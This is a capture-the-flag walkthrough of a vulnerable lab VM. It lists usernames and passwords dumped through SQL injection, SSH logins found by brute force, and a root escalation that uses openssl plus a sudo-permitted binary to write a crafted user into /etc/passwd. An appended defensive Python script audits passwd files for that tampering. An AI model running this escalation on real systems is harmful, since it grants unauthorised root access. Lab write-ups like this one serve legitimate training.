ipaddress: 192.168.56.19

### information_gathering

open-port: 80

find sql injection:

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609397539579-f2a8180c-e460-4859-8552-7112d29aa3b3.png#align=left&display=inline&height=555&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1110&originWidth=2020&size=100529&status=done&style=none&width=1010)

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609397552701-17eb650d-dcd3-4c38-a8bb-22c3dde378c3.png#align=left&display=inline&height=664&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1328&originWidth=1364&size=171061&status=done&style=none&width=682)

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609397522521-a1abf61a-d4ae-41d0-8599-5fb1c60289a1.png#align=left&display=inline&height=737&margin=%5Bobject%20Object%5D&name=image.png&originHeight=1474&originWidth=2498&size=975968&status=done&style=none&width=1249)

user: marym julied fredf barneyr tomc jerrym wilmaf bettyr chandlerb joeyt rachelg rossg monicag phoebeb scoots janitor janitor2

| pass |
| --- |
| 3kfs86sfd |
| 468sfdfsd2 |
| 4sfd87sfd1 |
| RocksOff |
| TC&TheBoyz |
| B8m#48sd |
| Pebbles |
| BamBam01 |
| UrAG0D! |
| Passw0rd |
| yN72#dsd |
| ILoveRachel |
| 3248dsds7s |
| smellycats |
| YR3BVxxxw87 |
| Ilovepeepee |
| Hawaii-Five-0 |

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609398386385-9e490722-237a-497d-9e46-b8346a8ec63f.png#align=left&display=inline&height=285&margin=%5Bobject%20Object%5D&name=image.png&originHeight=570&originWidth=2316&size=240874&status=done&style=none&width=1158)

admin transorbital1

Nothing much turned up in the admin backend, so I turned to SSH.

### Establish a foothold

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609398811981-b72a4ef0-2f10-433d-8efd-144373bf1364.png#align=left&display=inline&height=83&margin=%5Bobject%20Object%5D&name=image.png&originHeight=166&originWidth=1374&size=97749&status=done&style=none&width=687)

Got three accounts:

```
chandlerb:UrAG0D!
joeyt:Passw0rd
janitor:Ilovepeepee
```

janitor: found some passwords: ...

joeyt: nothing to be found, so I added the passwords to ssh_pwd to brute-force again:

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609400712189-0636bd17-31cf-42d7-ae70-a9697b833627.png#align=left&display=inline&height=129&margin=%5Bobject%20Object%5D&name=image.png&originHeight=258&originWidth=1422&size=135709&status=done&style=none&width=711)

go on~:

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609400835771-fe1630a9-84ea-46e1-8cc2-6885b8fcf88c.png#align=left&display=inline&height=421&margin=%5Bobject%20Object%5D&name=image.png&originHeight=842&originWidth=2106&size=362343&status=done&style=none&width=1053)

![image.png](https://cdn.nlark.com/yuque/0/2020/png/10362401/1609401139389-11190a0e-e544-4165-afde-e0fd32c10f73.png#align=left&display=inline&height=294&margin=%5Bobject%20Object%5D&name=image.png&originHeight=588&originWidth=2016&size=89522&status=done&style=none&width=1008)

```
openssl passwd -1 -salt gits password
```

```
$1$gits$zyQ/0nRnnKb7vab/jPE.I1
```

```
/tmp/hackin
sudo ./test /tmp/hackin /etc/passwd
su git
passwd is toor
```
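
A defensive check for the outcome of the last step, as an added example that is not part of the original write-up: it audits passwd-format text for a UID 0 account other than root and for a crypt hash stored directly in the password field (the kind of `$1$` value `openssl passwd -1` prints). It assumes the step above leaves such an entry in `/etc/passwd`; the sample lines and the `audit_passwd` name are constructed for illustration.

```python
import re

# Constructed sample in /etc/passwd format (not taken from the target host).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
janitor:x:1016:1016::/home/janitor:/bin/bash
svcacct:$1$abcd$0123456789abcdefghijkl:0:0::/root:/bin/bash
broken line without fields
"""

# crypt(3)-style prefixes: $1$ (MD5-crypt), $5$, $6$, $y$, $2b$ ...
HASH_RE = re.compile(r"^\$[0-9a-z]{1,2}\$")
# Values that mean "password lives in /etc/shadow" or "account locked".
PLACEHOLDERS = {"x", "*", "!", "!!"}


def audit_passwd(text):
    """Return (line_number, finding, detail) tuples for suspicious entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, "malformed", line))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        # Any second account with UID 0 is a full root equivalent.
        if uid == "0" and name != "root":
            findings.append((lineno, "uid0-not-root", name))
        # A hash here is honoured by login and su, bypassing /etc/shadow.
        if HASH_RE.match(pw):
            findings.append((lineno, "hash-in-passwd", name))
        elif pw == "":
            findings.append((lineno, "empty-password", name))
        elif pw not in PLACEHOLDERS:
            findings.append((lineno, "unexpected-password-field", name))
    return findings


if __name__ == "__main__":
    for lineno, finding, detail in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {finding}: {detail}")
```

On a live host, pass the contents of `/etc/passwd` to `audit_passwd` and also review which `sudo` rules let unprivileged users run a binary that can write to that file.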